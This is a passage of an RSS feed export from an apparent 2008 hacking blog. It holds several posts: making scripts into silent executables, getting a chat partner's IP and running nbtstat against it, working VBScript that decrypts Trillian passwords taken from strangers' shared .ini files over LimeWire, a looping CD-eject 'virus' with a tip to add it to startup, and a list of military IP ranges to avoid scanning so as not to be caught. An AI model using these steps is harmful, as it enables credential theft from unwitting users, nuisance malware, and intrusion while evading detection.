Finished Message for my users. Select “No message” and choose Next.&lt;br /&gt;&lt;br /&gt;Step 12&lt;br /&gt;The Package Name and Options window is where the new .exe specified. Type in a path or browse to the folder you would like your .exe in, type a name in the file name box and click save. Also check the box that says “Hide File Extraction Progress Animation from User.” If you’re worried about long file names go ahead and click the other box as well.&lt;br /&gt;&lt;br /&gt;Step 13&lt;br /&gt;Since we really aren’t installing anything we probably want to tell the Configure Restart window to not restart. So choose the option that says “No restart” and hit Next.&lt;br /&gt;&lt;br /&gt;Step 14&lt;br /&gt;This window is where you have a chance to save all of the options you have chosen into a project file so that if necessary you may later return and make modifications. I have no need to retain the file, but if you would like to be able to come back to it, by all means choose “Save Self Extraction Directive (SED) file” and tell it where to put it. As always, click Next.&lt;br /&gt;&lt;br /&gt;Step 15&lt;br /&gt;Here’s where you’re new .exe is born, on the Create Package screen. Explore to the directory you told it to put the file in, click Next and then watch your little .exe’s first moments as it pops into the big digital world.&lt;br /&gt;&lt;br /&gt;Step 16&lt;br /&gt;You’re done! Click finish and go try it out.&lt;br /&gt;&lt;br /&gt;Blackcoder&lt;br /&gt; &lt;/span&gt;</description><link>http://blackcoder-hiren.blogspot.com/2008/03/to-convert-bat-or-vbs-file-into.html</link><author>noreply@blogger.com (Hiren)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-7257387882518842743</guid><pubDate>Mon, 03 Mar 2008 17:12:00 +0000</pubDate><atom:updated>2008-03-03T09:12:50.549-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking With IP Address</category><title>Change Your IP...</title><description>&lt;span class=&quot;postbody&quot;&gt;1. Click on &quot;Start&quot; in the bottom left hand corner of screen&lt;br /&gt;2. Click on &quot;Run&quot;&lt;br /&gt;3. Type in &quot;command&quot; and hit ok&lt;br /&gt;&lt;br /&gt;You should now be at an MSDOS prompt screen.&lt;br /&gt;&lt;br /&gt;4. Type &quot;ipconfig /release&quot; just like that, and hit &quot;enter&quot;&lt;br /&gt;5. Type &quot;exit&quot; and leave the prompt&lt;br /&gt;6. Right-click on &quot;Network Places&quot; or &quot;My Network Places&quot; on your desktop.&lt;br /&gt;7. Click on &quot;properties&quot;&lt;br /&gt;&lt;br /&gt;You should now be on a screen with something titled &quot;Local Area Connection&quot;, or something close to that, and, if you have a network hooked up, all of your other networks.&lt;br /&gt;&lt;br /&gt;8. Right click on &quot;Local Area Connection&quot; and click &quot;properties&quot;&lt;br /&gt;9. Double-click on the &quot;Internet Protocol (TCP/IP)&quot; from the list under the &quot;General&quot; tab&lt;br /&gt;10. Click on &quot;Use the following IP address&quot; under the &quot;General&quot; tab&lt;br /&gt;11. Create an IP address (It doesn&#39;t matter what it is. I just type 1 and 2 until i fill the area up).&lt;br /&gt;12. Press &quot;Tab&quot; and it should automatically fill in the &quot;Subnet Mask&quot; section with default numbers.&lt;br /&gt;13. Hit the &quot;Ok&quot; button here&lt;br /&gt;14. Hit the &quot;Ok&quot; button again&lt;br /&gt;&lt;br /&gt;You should now be back to the &quot;Local Area Connection&quot; screen.&lt;br /&gt;&lt;br /&gt;15. Right-click back on &quot;Local Area Connection&quot; and go to properties again.&lt;br /&gt;16. Go back to the &quot;TCP/IP&quot; settings&lt;br /&gt;17. This time, select &quot;Obtain an IP address automatically&quot;&lt;br /&gt;tongue.gif 18. Hit &quot;Ok&quot;&lt;br /&gt;19. Hit &quot;Ok&quot; again&lt;br /&gt;20. You now have a new IP address&lt;br /&gt;&lt;br /&gt;do at ur own risk&lt;br /&gt;Blackcoder&lt;br /&gt;&lt;/span&gt;</description><link>http://blackcoder-hiren.blogspot.com/2008/03/change-your-ip.html</link><author>noreply@blogger.com (Hiren)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-1126388407958592407</guid><pubDate>Mon, 03 Mar 2008 17:10:00 +0000</pubDate><atom:updated>2008-03-03T09:11:35.208-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking With IP Address</category><title>Break Yahoo Account While Chatting....</title><description>&lt;span class=&quot;postbody&quot;&gt;This is only for education purpose.So who ever try this is at his risk. &lt;br /&gt;I am not sure that this will work 100 %.But yes will work almost 70 percent of the times.But before that you need to know some few things of yahoo chat protocol&lt;br /&gt;leave a comment here after u see the post lemme know if it does works or not or u havin a problem post here&lt;br /&gt;&lt;br /&gt;Following are the features : - &lt;br /&gt;&lt;br /&gt;1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages. &lt;br /&gt;&lt;br /&gt;2) When we send files yahoo has 2 options &lt;br /&gt;&lt;br /&gt;a) Either it uploads the file and then the other client has to down load it. &lt;br /&gt;b) Either it connects to the client directly and gets the files &lt;br /&gt;&lt;br /&gt;3) When we use video or audio:- &lt;br /&gt;&lt;br /&gt;a) It either goes thru the server &lt;br /&gt;b) Or it has client to client connection &lt;br /&gt;And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remeber i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.&lt;br /&gt;So lets analyse &lt;br /&gt;&lt;br /&gt;1) Its impossible to get a Attackers IP address when you only chat. &lt;br /&gt;&lt;br /&gt;2) There are 50 % chances of getting a IP address when you send files &lt;br /&gt;&lt;br /&gt;3) Again 50 % chances of getting IP when you use video or audio. &lt;br /&gt;&lt;br /&gt;So why to wait lets exploit those 50 % chances.I will explain only for files here which lies same for Video or audio &lt;br /&gt;&lt;br /&gt;1) Go to dos &lt;br /&gt;&lt;br /&gt;type -&gt; &lt;br /&gt;netstat -n 3 &lt;br /&gt;&lt;br /&gt;You will get the following output.Just do not care and be cool &lt;br /&gt;Active Connections &lt;br /&gt;&lt;br /&gt;Proto Local Address Foreign Address State &lt;br /&gt;TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED &lt;br /&gt;TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED &lt;br /&gt;TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED &lt;br /&gt;TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED &lt;br /&gt;&lt;br /&gt;Active Connections &lt;br /&gt;&lt;br /&gt;Proto Local Address Foreign Address State &lt;br /&gt;TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED &lt;br /&gt;TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED &lt;br /&gt;TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED &lt;br /&gt;TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED &lt;br /&gt;&lt;br /&gt;Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next -&gt;&lt;br /&gt;&lt;br /&gt;2) Try sending a file to the Target . &lt;br /&gt;if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established&lt;br /&gt;HMMMM then the first attacker first phase is over &lt;br /&gt;This is the output in your netstat.The 5101 number port is where the Attacker is connected. &lt;br /&gt;Active Connections &lt;br /&gt;&lt;br /&gt;Proto Local Address Foreign Address State &lt;br /&gt;TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED &lt;br /&gt;TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED &lt;br /&gt;TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED &lt;br /&gt;TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED &lt;br /&gt;TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED &lt;br /&gt;&lt;br /&gt;Thats what is highlighted in RED. So what next &lt;br /&gt;3) Hmmm Ok so make a DOS attack now &lt;br /&gt;Go to dos prompt and &lt;br /&gt;Just do &lt;br /&gt;nbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network. &lt;br /&gt;C:\&gt;nbtstat -A 194.30.209.14 &lt;br /&gt;&lt;br /&gt;Local Area Connection: &lt;br /&gt;Node IpAddress: [194.30.209.15] Scope Id: &lt;br /&gt;NetBIOS Remote Machine Name Table &lt;br /&gt;&lt;br /&gt;Name Type Status &lt;br /&gt;--------------------------------------------- &lt;br /&gt;EDP12 &lt;00&gt; UNIQUE Registered &lt;br /&gt;SHIV &lt;00&gt; GROUP Registered &lt;br /&gt;SHIV &lt;20&gt; UNIQUE Registered &lt;br /&gt;SHIVCOMP1 &lt;1e&gt; GROUP Registered &lt;br /&gt;&lt;br /&gt;MAC Address = 00-C0-W0-D5-EF-9A &lt;br /&gt;&lt;br /&gt;Ok so you will ask now what next.No you find what you can do with this network than me explaining everything. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.&lt;br /&gt;Blackcoder&lt;br /&gt;&lt;/span&gt;</description><link>http://blackcoder-hiren.blogspot.com/2008/03/break-yahoo-account-while-chatting.html</link><author>noreply@blogger.com (Hiren)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-7848720849707206793</guid><pubDate>Mon, 03 Mar 2008 17:01:00 +0000</pubDate><atom:updated>2008-03-03T09:03:33.973-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">P2P (PC 2 PC) Hacking</category><title>Hack Passwords using Limewire...</title><description>&lt;span class=&quot;postbody&quot;&gt; 1. Download LimeWire and install it (Reboot computer if needed)&lt;br /&gt;The newest verion of LimeWire is here:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;a href=&quot;http://www.limewire.com/download/index.php&quot; target=&quot;_blank&quot;&gt;http://www.limewire.com/download/index.php&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;2. Open &quot;Notepad&quot;&lt;br /&gt;&lt;br /&gt;3. Copy and Paste the following code into Notepad&lt;br /&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;&lt;br /&gt;Dim key, keys, pwd, pwds, pwdl, maxval, goods, x&lt;br /&gt;key = &quot;243,038,129,196,057,134,219,146,113,163,185,230,0 83,122,149,&quot; &amp;amp; _&lt;br /&gt;&lt;br /&gt;&quot;124,000,000,000,000,000,000,255,000,000,128,000,0 00,000,128,&quot; &amp;amp; _&lt;br /&gt;&lt;br /&gt;&quot;128,000,255,000,000,000,128,000,128,000,128,128,0 00,000,000,&quot; &amp;amp; _&lt;br /&gt;&lt;br /&gt;&quot;128,255,000,128,000,255,000,128,128,128,000,085,1 10,097,098,&quot; &amp;amp; _&lt;br /&gt;&lt;br /&gt;&quot;108,101,032,116,111,032,114,101,115,111,108,118,1 01,032,072,&quot; &amp;amp; _&lt;br /&gt;&lt;br /&gt;&quot;084,084,080,032,112,114,111,120,000&quot;&lt;br /&gt;&lt;br /&gt;keys = split(key, &quot;,&quot;)&lt;br /&gt;&lt;br /&gt;main()&lt;br /&gt;&lt;br /&gt;sub main()&lt;br /&gt;&lt;br /&gt;pwd = &quot;&quot;&lt;br /&gt;&lt;br /&gt;pwd = inputbox(&quot;Enter the Encrypted Trillian Password&quot;, &quot;&quot;, &quot;&quot;)&lt;br /&gt;&lt;br /&gt;if pwd = &quot;&quot; then exit sub&lt;br /&gt;&lt;br /&gt;pwd = trim(pwd)&lt;br /&gt;&lt;br /&gt;pwdl = len(pwd)/2&lt;br /&gt;&lt;br /&gt;redim pwds(pwdl-1)&lt;br /&gt;&lt;br /&gt;for x = 0 to ubound(pwds)&lt;br /&gt;&lt;br /&gt;&#39;msgbox mid(pwd,(x * 2)+1,2)&lt;br /&gt;&lt;br /&gt;pwds(x) = int(&quot;&amp;amp;h&quot; &amp;amp; mid(pwd,(x * 2)+1,2))&lt;br /&gt;&lt;br /&gt;next&lt;br /&gt;&lt;br /&gt;if ubound(pwds) &gt; ubound(keys) then&lt;br /&gt;&lt;br /&gt;maxval = ubound(keys)&lt;br /&gt;&lt;br /&gt;else&lt;br /&gt;&lt;br /&gt;maxval = ubound(pwds)&lt;br /&gt;&lt;br /&gt;end if&lt;br /&gt;&lt;br /&gt;for x = 0 to maxval&lt;br /&gt;&lt;br /&gt;goods = goods &amp;amp; chr(pwds(x) xor keys(x))&lt;br /&gt;&lt;br /&gt;next&lt;br /&gt;&lt;br /&gt;inputbox &quot;Decrypted Password&quot;,&quot;&quot;,goods&lt;br /&gt;&lt;br /&gt;end sub&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;4. Select FILE and choose SAVE AS&lt;br /&gt;&lt;br /&gt;5. From the &quot;Save as Type&quot; drop-down menu select &quot;All Files (*.*)&quot;&lt;br /&gt;&lt;br /&gt;6. Save the file as &quot;TrillianPass.vbs&quot; in the desired folder. Remember it&#39;s location.&lt;br /&gt;&lt;br /&gt;7. Start LimeWire&lt;br /&gt;&lt;br /&gt;8. Initiate a search for the following files:&lt;br /&gt;aim.ini&lt;br /&gt;yahoo.ini&lt;br /&gt;msn.ini&lt;br /&gt;&lt;br /&gt;9. Download any results that match the above file names. Note:&lt;br /&gt;Only download files that are in lowercase letters.&lt;br /&gt;Most files above 6 or 7 KB will not be the files your looking for.&lt;br /&gt;&lt;br /&gt;10. Open the downloaded file in Notepad.&lt;br /&gt;&lt;br /&gt;11. The screen name, CoolGuy1234, and the encrypted password can be seen. Now the password must be decrypted. Highlight and copy the encrypted password.&lt;br /&gt;&lt;br /&gt;12. Open the file that was created earlier: TrillianPass.vbs&lt;br /&gt;&lt;br /&gt;13. Paste the encryped password into the Trillian Password Cracker and press &quot;OK&quot; to reveal the real password&lt;br /&gt;&lt;br /&gt;14. How this works:&lt;br /&gt;&lt;br /&gt;The people from whom you are downloading files (which contain passwords) have the programs Trillian and LimeWire (or a similar file sharing program). These people are sharing all of the files on their computer with people around the globe/country. This is because their LimeWire program&#39;s preferences are set to share a whole drive instead of just one or two folders .&lt;/span&gt;</description><link>http://blackcoder-hiren.blogspot.com/2008/03/hack-passwords-using-limewire.html</link><author>noreply@blogger.com (Hiren)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-8649928695246440695</guid><pubDate>Sun, 02 Mar 2008 12:12:00 +0000</pubDate><atom:updated>2008-03-02T04:13:46.389-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Linux Hacking</category><title>Accessing window&#39;s system from linux ...</title><description>&lt;h3 class=&quot;smller&quot;&gt;Accessing window&#39;s system from linux :&lt;/h3&gt; &lt;div class=&quot;para&quot;&gt; type in terminal..&lt;br /&gt;rdesktop -f (for full screen) IPAddress&lt;br /&gt;that&#39;s it .........&lt;br /&gt;ex:&lt;br /&gt;[root @ filesystem] rdesktop -a 24 -f IP&lt;br /&gt;&lt;br /&gt;Blackcoder&lt;br /&gt;&lt;/div&gt;</description><link>http://blackcoder-hiren.blogspot.com/2008/03/accessing-windows-system-from-linux.html</link><author>noreply@blogger.com (Hiren)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-497644690079529624</guid><pubDate>Sun, 02 Mar 2008 12:07:00 +0000</pubDate><atom:updated>2008-03-02T04:08:31.033-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Fun With Hacking</category><title>AutoCDRom open/close Virus...</title><description>&lt;h3 class=&quot;smller&quot;&gt;AutoCDRom open/close Virus&lt;br /&gt;&lt;/h3&gt; &lt;div class=&quot;para&quot;&gt; Its just a simple java script but its starts a loop thats keeping opening and closing your CD Drive.&lt;br /&gt;Heres how it goes&lt;br /&gt;&lt;br /&gt;Set oWMP = CreateObject(&quot;WMPlayer.OCX.7&quot; )&lt;br /&gt;Set colCDROMs = oWMP.cdromCollection&lt;br /&gt;if colCDROMs.Count &gt;= 1 then&lt;br /&gt;do&lt;br /&gt;For i = 0 to colCDROMs.Count - 1&lt;br /&gt;colCDROMs.Item(i).Eject&lt;br /&gt;Next &#39; cdrom&lt;br /&gt;For i = 0 to colCDROMs.Count - 1&lt;br /&gt;colCDROMs.Item(i).Eject&lt;br /&gt;Next &#39; cdrom&lt;br /&gt;loop&lt;br /&gt;End If&lt;br /&gt;&lt;br /&gt;Save as .vbs and run it.&lt;br /&gt;&lt;br /&gt;Harmless but loads of fun. Just think what all you can do by adding it to startup &lt;/div&gt;</description><link>http://blackcoder-hiren.blogspot.com/2008/03/autocdrom-openclose-virus.html</link><author>noreply@blogger.com (Hiren)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-8561918759701937492</guid><pubDate>Thu, 28 Feb 2008 16:09:00 +0000</pubDate><atom:updated>2008-02-28T08:11:52.592-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking With IP Address</category><title>IPs not to scan....</title><description>&lt;span style=&quot;font-weight: bold;&quot;&gt;    If you don&#39;t want to get caught , absolutely don&#39;t scan following IPs...&lt;/span&gt;&lt;br /&gt;&lt;p&gt; RANGE 6&lt;br /&gt;6.* - Army Information Systems Center&lt;br /&gt;&lt;br /&gt;RANGE 7&lt;br /&gt;7.*.*.* Defense Information Systems Agency, VA&lt;br /&gt;&lt;br /&gt;RANGE 11&lt;br /&gt;11.*.*.* DoD Intel Information Systems, Defense Intelligence Agency, Washington DC&lt;br /&gt;&lt;br /&gt;RANGE 21&lt;br /&gt;21. - US Defense Information Systems Agency&lt;br /&gt;&lt;br /&gt;RANGE 22&lt;br /&gt;22.* - Defense Information Systems Agency&lt;br /&gt;&lt;br /&gt;RANGE 24&lt;br /&gt;24.198.*.*&lt;br /&gt;&lt;br /&gt;RANGE 25&lt;br /&gt;25.*.*.* Royal Signals and Radar Establishment, UK&lt;br /&gt;&lt;br /&gt;RANGE 26&lt;br /&gt;26.* - Defense Information Systems Agency&lt;br /&gt;&lt;br /&gt;RANGE 29&lt;br /&gt;29.* - Defense Information Systems Agency&lt;br /&gt;&lt;br /&gt;RANGE 30&lt;br /&gt;30.* - Defense Information Systems Agency&lt;br /&gt;&lt;br /&gt;RANGE 49&lt;br /&gt;49.* - Joint Tactical Command&lt;br /&gt;&lt;br /&gt;RANGE 50&lt;br /&gt;50.* - Joint Tactical Command&lt;br /&gt;&lt;br /&gt;RANGE 55&lt;br /&gt;55.* - Army National Guard Bureau&lt;br /&gt;&lt;br /&gt;RANGE 55&lt;br /&gt;55.* - Army National Guard Bureau&lt;br /&gt;&lt;br /&gt;RANGE 62&lt;br /&gt;62.0.0.1 - 62.30.255.255 Do not scan!&lt;br /&gt;&lt;br /&gt;RANGE 64&lt;br /&gt;64.70.*.* Do not scan&lt;br /&gt;64.224.* Do not Scan&lt;br /&gt;64.225.* Do not scan&lt;br /&gt;64.226.* Do not scan&lt;br /&gt;&lt;br /&gt;RANGE 128&lt;br /&gt;128.37.0.0 Army Yuma Proving Ground&lt;br /&gt;128.38.0.0 Naval Surface Warfare Center&lt;br /&gt;128.43.0.0 Defence Research Establishment-Ottawa&lt;br /&gt;128.47.0.0 Army Communications Electronics Command&lt;br /&gt;128.49.0.0 Naval Ocean Systems Center&lt;br /&gt;128.50.0.0 Department of Defense&lt;br /&gt;128.51.0.0 Department of Defense&lt;br /&gt;128.56.0.0 U.S. Naval Academy&lt;br /&gt;128.60.0.0 Naval Research Laboratory&lt;br /&gt;128.63.0.0 Army Ballistics Research Laboratory&lt;br /&gt;128.80.0.0 Army Communications Electronics Command&lt;br /&gt;128.98.0.0 - 128.98.255.255 Defence Evaluation and Research Agency&lt;br /&gt;128.102.0.0 NASA Ames Research Center&lt;br /&gt;128.149.0.0 NASA Headquarters&lt;br /&gt;128.154.0.0 NASA Wallops Flight Facility&lt;br /&gt;128.155.0.0 NASA Langley Research Center&lt;br /&gt;128.156.0.0 NASA Lewis Network Control Center&lt;br /&gt;128.157.0.0 NASA Johnson Space Center&lt;br /&gt;128.158.0.0 NASA Ames Research Center&lt;br /&gt;128.159.0.0 NASA Ames Research Center&lt;br /&gt;128.160.0.0 Naval Research Laboratory&lt;br /&gt;128.161.0.0 NASA Ames Research Center&lt;br /&gt;128.183.0.0 NASA Goddard Space Flight Center&lt;br /&gt;128.190.0.0 Army Belvoir Reasearch and Development Center&lt;br /&gt;128.202.0.0 50th Space Wing&lt;br /&gt;128.216.0.0 MacDill Air Force Base&lt;br /&gt;128.217.0.0 NASA Kennedy Space Center&lt;br /&gt;128.236.0.0 U.S. Air Force Academy&lt;br /&gt;&lt;br /&gt;RANGE 129&lt;br /&gt;129.23.0.0 Strategic Defense Initiative Organization&lt;br /&gt;129.29.0.0 United States Military Academy&lt;br /&gt;129.50.0.0 NASA Marshall Space Flight Center&lt;br /&gt;129.51.0.0 Patrick Air Force Base&lt;br /&gt;129.52.0.0 Wright-Patterson Air Force Base&lt;br /&gt;129.53.0.0 - 129.53.255.255 66SPTG-SCB&lt;br /&gt;129.54.0.0 Vandenberg Air Force Base, CA&lt;br /&gt;129.92.0.0 Air Force Institute of Technology&lt;br /&gt;129.99.0.0 NASA Ames Research Center&lt;br /&gt;129.131.0.0 Naval Weapons Center&lt;br /&gt;129.139.0.0 Army Armament Research Development and Engineering Center&lt;br /&gt;129.141.0.0 85 MISSION SUPPORT SQUADRON/SCSN&lt;br /&gt;129.163.0.0 NASA/Johnson Space Center&lt;br /&gt;129.164.0.0 NASA IVV&lt;br /&gt;129.165.0.0 NASA Goddard Space Flight Center&lt;br /&gt;129.166.0.0 NASA - John F. Kennedy Space Center&lt;br /&gt;129.167.0.0 NASA Marshall Space Flight Center&lt;br /&gt;129.168.0.0 NASA Lewis Research Center&lt;br /&gt;129.190.0.0 Naval Underwater Systems Center&lt;br /&gt;129.198.0.0 Air Force Flight Test Center&lt;br /&gt;129.209.0.0 Army Ballistics Research Laboratory&lt;br /&gt;129.229.0.0 U.S. Army Corps of Engineers&lt;br /&gt;129.251.0.0 United States Air Force Academy&lt;br /&gt;&lt;br /&gt;RANGE 130&lt;br /&gt;130.40.0.0 NASA Johnson Space Center&lt;br /&gt;130.90.0.0 Mather Air Force Base&lt;br /&gt;130.109.0.0 Naval Coastal Systems Center&lt;br /&gt;130.114.0.0 Army Aberdeen Proving Ground Installation Support Activity&lt;br /&gt;130.124.0.0 Honeywell Defense Systems Group&lt;br /&gt;130.165.0.0 U.S.Army Corps of Engineers&lt;br /&gt;130.167.0.0 NASA Headquarters&lt;br /&gt;&lt;br /&gt;RANGE 131&lt;br /&gt;131.3.0.0 - 131.3.255.255 Mather Air Force Base&lt;br /&gt;131.6.0.0 Langley Air Force Base&lt;br /&gt;131.10.0.0 Barksdale Air Force Base&lt;br /&gt;131.17.0.0 Sheppard Air Force Base&lt;br /&gt;131.21.0.0 Hahn Air Base&lt;br /&gt;131.22.0.0 Keesler Air Force Base&lt;br /&gt;131.24.0.0 6 Communications Squadron&lt;br /&gt;131.25.0.0 Patrick Air Force Base&lt;br /&gt;131.27.0.0 75 ABW&lt;br /&gt;131.30.0.0 62 CS/SCSNT&lt;br /&gt;131.32.0.0 37 Communications Squadron&lt;br /&gt;131.35.0.0 Fairchild Air Force Base&lt;br /&gt;131.36.0.0 Yokota Air Base&lt;br /&gt;131.37.0.0 Elmendorf Air Force Base&lt;br /&gt;131.38.0.0 Hickam Air Force Base&lt;br /&gt;131.39.0.0 354CS/SCSN&lt;br /&gt;131.40.0.0 Bergstrom Air Force Base&lt;br /&gt;131.44.0.0 Randolph Air Force Base&lt;br /&gt;131.46.0.0 20 Communications Squadron&lt;br /&gt;131.47.0.0 Andersen Air Force Base&lt;br /&gt;131.50.0.0 Davis-Monthan Air Force Base&lt;br /&gt;131.52.0.0 56 Communications Squadron /SCBB&lt;br /&gt;131.54.0.0 Air Force Concentrator Network&lt;br /&gt;131.56.0.0 Upper Heyford Air Force Base&lt;br /&gt;131.58.0.0 Alconbury Royal Air Force Base&lt;br /&gt;131.59.0.0 7 Communications Squadron&lt;br /&gt;131.61.0.0 McConnell Air Force Base&lt;br /&gt;131.62.0.0 Norton Air Force Base&lt;br /&gt;131.71.0.0 - 131.71.255.255 NAVAL AVIATION DEPOT CHERRY PO&lt;br /&gt;131.74.0.0 Defense MegaCenter Columbus&lt;br /&gt;131.84.0.0 Defense Technical Information Center&lt;br /&gt;131.92.0.0 Army Information Systems Command - Aberdeen (EA)&lt;br /&gt;131.105.0.0 McClellan Air Force Base&lt;br /&gt;131.110.0.0 NASA/Michoud Assembly Facility&lt;br /&gt;131.120.0.0 Naval Postgraduate School&lt;br /&gt;131.121.0.0 United States Naval Academy&lt;br /&gt;131.122.0.0 United States Naval Academy&lt;br /&gt;131.176.0.0 European Space Operations Center&lt;br /&gt;131.182.0.0 NASA Headquarters&lt;br /&gt;131.250.0.0 Office of the Chief of Naval Research&lt;br /&gt;&lt;br /&gt;RANGE 132&lt;br /&gt;132.3.0.0 Williams Air Force Base&lt;br /&gt;132.5.0.0 - 132.5.255.255 49th Fighter Wing&lt;br /&gt;132.6.0.0 Ankara Air Station&lt;br /&gt;132.7.0.0 - 132.7.255.255 SSG/SINO&lt;br /&gt;132.9.0.0 28th Bomb Wing&lt;br /&gt;132.10.0.0 319 Comm Sq&lt;br /&gt;132.11.0.0 Hellenikon Air Base&lt;br /&gt;132.12.0.0 Myrtle Beach Air Force Base&lt;br /&gt;132.13.0.0 Bentwaters Royal Air Force Base&lt;br /&gt;132.14.0.0 Air Force Concentrator Network&lt;br /&gt;132.15.0.0 Kadena Air Base&lt;br /&gt;132.16.0.0 Kunsan Air Base&lt;br /&gt;132.17.0.0 Lindsey Air Station&lt;br /&gt;132.18.0.0 McGuire Air Force Base&lt;br /&gt;132.19.0.0 100CS (NET-MILDENHALL)&lt;br /&gt;132.20.0.0 35th Communications Squadron&lt;br /&gt;132.21.0.0 Plattsburgh Air Force Base&lt;br /&gt;132.22.0.0 23Communications Sq&lt;br /&gt;132.24.0.0 Dover Air Force Base&lt;br /&gt;132.25.0.0 786 CS/SCBM&lt;br /&gt;132.27.0.0 - 132.27.255.255 39CS/SCBBN&lt;br /&gt;132.28.0.0 14TH COMMUNICATION SQUADRON&lt;br /&gt;132.30.0.0 Lajes Air Force Base&lt;br /&gt;132.31.0.0 Loring Air Force Base&lt;br /&gt;132.33.0.0 60CS/SCSNM&lt;br /&gt;132.34.0.0 Cannon Air Force Base&lt;br /&gt;132.35.0.0 Altus Air Force Base&lt;br /&gt;132.37.0.0 75 ABW&lt;br /&gt;132.38.0.0 Goodfellow AFB&lt;br /&gt;132.39.0.0 K.I. Sawyer Air Force Base&lt;br /&gt;132.40.0.0 347 COMMUNICATION SQUADRON&lt;br /&gt;132.42.0.0 Spangdahlem Air Force Base&lt;br /&gt;132.43.0.0 Zweibruchen Air Force Base&lt;br /&gt;132.45.0.0 Chanute Air Force Base&lt;br /&gt;132.46.0.0 Columbus Air Force Base&lt;br /&gt;132.48.0.0 Laughlin Air Force Base&lt;br /&gt;132.49.0.0 366CS/SCSN&lt;br /&gt;132.50.0.0 Reese Air Force Base&lt;br /&gt;132.52.0.0 Vance Air Force Base&lt;br /&gt;132.54.0.0 Langley AFB&lt;br /&gt;132.55.0.0 Torrejon Air Force Base&lt;br /&gt;132.56.0.0 - 132.56.255.255 9 CS/SC&lt;br /&gt;132.57.0.0 Castle Air Force Base&lt;br /&gt;132.58.0.0 Nellis Air Force Base&lt;br /&gt;132.59.0.0 24Comm Squadron\SCSNA&lt;br /&gt;132.60.0.0 - 132.60.255.255 42ND COMMUNICATION SQUADRON&lt;br /&gt;132.61.0.0 SSG/SIN&lt;br /&gt;132.62.0.0 - 132.62.255.255 377 COMMUNICATION SQUADRON&lt;br /&gt;132.79.0.0 Army National Guard Bureau&lt;br /&gt;132.80.0.0 - 132.80.255.255 NGB-AIS-OS&lt;br /&gt;132.80.0.0 - 132.85.255.255 National Guard Bureau&lt;br /&gt;132.82.0.0 Army National Guard Bureau&lt;br /&gt;132.86.0.0 National Guard Bureau&lt;br /&gt;132.87.0.0 - 132.93.255.255 National Guard Bureau&lt;br /&gt;132.94.0.0 Army National Guard Bureau&lt;br /&gt;132.95.0.0 - 132.103.255.255 National Guard Bureau&lt;br /&gt;132.95.0.0 - 132.108.0.0 DOD Network Information Center&lt;br /&gt;132.104.0.0 - 132.104.255.255 Army National Guard Bureau&lt;br /&gt;132.105.0.0 - 132.108.255.255 Army National Guard Bureau&lt;br /&gt;132.109.0.0 National Guard Bureau&lt;br /&gt;132.110.0.0 - 132.116.255.255 Army National Guard Bureau&lt;br /&gt;132.114.0.0 Army National Guard&lt;br /&gt;132.117.0.0 Army National Guard Bureau&lt;br /&gt;132.118.0.0 - 132.132.0.0 Army National Guard Bureau&lt;br /&gt;132.122.0.0 South Carolina Army National Guard, USPFO&lt;br /&gt;132.133.0.0 National Guard Bureau&lt;br /&gt;132.134.0.0 - 132.143.255.255 National Guard Bureau&lt;br /&gt;132.159.0.0 Army Information Systems Command&lt;br /&gt;132.193.0.0 Army Research Office&lt;br /&gt;132.250.0.0 Naval Research Laboratory&lt;br /&gt;&lt;br /&gt;RANGE 134&lt;br /&gt;134.5.0.0 Lockheed Aeronautical Systems Company&lt;br /&gt;134.11.0.0 The Pentagon&lt;br /&gt;134.12.0.0 NASA Ames Research Center&lt;br /&gt;134.51.0.0 Boeing Military Aircraft Facility&lt;br /&gt;134.52.*.* Boeing Corporation&lt;br /&gt;134.78.0.0 Army Information Systems Command-ATCOM&lt;br /&gt;134.80.0.0 Army Information Systems Command&lt;br /&gt;134.118.0.0 NASA/Johnson Space Center&lt;br /&gt;134.131.0.0 Wright-Patterson Air Force Base&lt;br /&gt;134.136.0.0 Wright-Patterson Air Force Base&lt;br /&gt;134.164.0.0 Army Engineer Waterways Experiment Station&lt;br 